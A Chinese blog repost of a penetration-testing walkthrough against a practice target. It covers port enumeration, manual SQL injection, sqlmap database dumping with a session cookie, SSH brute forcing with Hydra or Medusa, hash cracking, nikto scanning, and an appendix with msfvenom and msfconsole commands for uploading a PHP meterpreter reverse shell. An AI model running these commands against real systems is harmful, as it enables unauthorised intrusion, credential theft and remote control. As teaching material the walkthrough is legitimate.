分享一种简单的渗透测试思路

admin 2024年11月25日11:32:04评论27 views字数 1258阅读4分11秒阅读模式

安全君呀设为"星标️"

第一时间收到文章更新

声明: 安全君呀 公众号文章中的技术只做研究之用,禁止用来从事非法用途,如有使用文章中的技术从事非法活动,一切后果由使用者自负,与本公众号无关。

文章声明:本篇文章内容部分选取网络,如有侵权,请告知删除。

1、web漏洞挖掘思路:

sql注入漏洞:登陆表单和函数传参页面(根据平时积累);
工具自动化测试(web服务枚举,sqlmap自动化注入)。

2、ssh利用思路:

得到用户名和密码,可以用九头蛇或者美杜莎爆破弱口令;
如果得到web管理或者系统账号,可以尝试连接ssh,如能连接上无需反弹shell;
如果得到mysq数据库里面md5密码,使用john或者在线md5解密网站。

3、靶机开放端口及对应的服务:

22端口 ssh服务

80端口 http服务

139端口 SAMBA服务

901端口 http的SAMBA

8080端口 http服务

10000端口 http服务

4、Wappalyzer插件:

分享一种简单的渗透测试思路

5、查看网页源码

分享一种简单的渗透测试思路

http(80/tcp)手动查看,发现网站相关工作人员的信息。

6、手工挖掘漏洞

SQL注入挖掘

分享一种简单的渗透测试思路

查看博文,发现url存在参数 ?id=4, 下面进行手动测试

或者:

有些网页需要登录状态才能访问,注册登录后访问后,输入简单注入语句测试,发现注入点。 

分享一种简单的渗透测试思路

分享一种简单的渗透测试思路

7、SQLmap 要cookie

分享一种简单的渗透测试思路

# sqlmap注入:sqlmap -u "http://目标IP"--dbs # 爆库 -D 库名--tables # 爆表-T 表名--columns 爆列-C 列名,列名,……--dump--batch

在登录状态后访问的页面上sqlmap注入报错:

分享一种简单的渗透测试思路

缺少cookie,需要加上:

-p id--cookie=""

抓包 或者 F12,Console,下面搜索 document.cookie

分享一种简单的渗透测试思路

分享一种简单的渗透测试思路

分享一种简单的渗透测试思路

分享一种简单的渗透测试思路

分享一种简单的渗透测试思路

8、结合nikto进行漏洞挖掘

CGI perl CGI nikto

CGI:1,web服务器的安全

      2,cgi语言的安全

web服务器软件编制中的bug

web服务器的配置错误

nikto -h http://目标IP

附录:

MSF反弹shell

# 用MSF生成反弹shellmsfvenom -p php/meterpreter_reverse_tcp LHOST=kali的IP LPORT=4444 -o shell.php# shell.php 文件上传到目标主机

reverse_tcp:本机开放端口,目标主机连接

bind_tcp:目标主机开放端口,本机连接

查看开放端口信息:

netstat -tunlp

分享一种简单的渗透测试思路

msfconsole # 开启msfmsf > use exploit/multi/handler # 使用攻击模块msf exploit(handler)> set payload php/meterpreter_reverse_tcpmsf exploit(handler)> set lhost Kali的IPmsf exploit(handler)> exploitmsf exploit(handler)> sessions 1sysinfoshell

分享一种简单的渗透测试思路

分享一种简单的渗透测试思路

原文始发于微信公众号(安全君呀):分享一种简单的渗透测试思路

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月25日11:32:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   分享一种简单的渗透测试思路https://cn-sec.com/archives/3434072.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息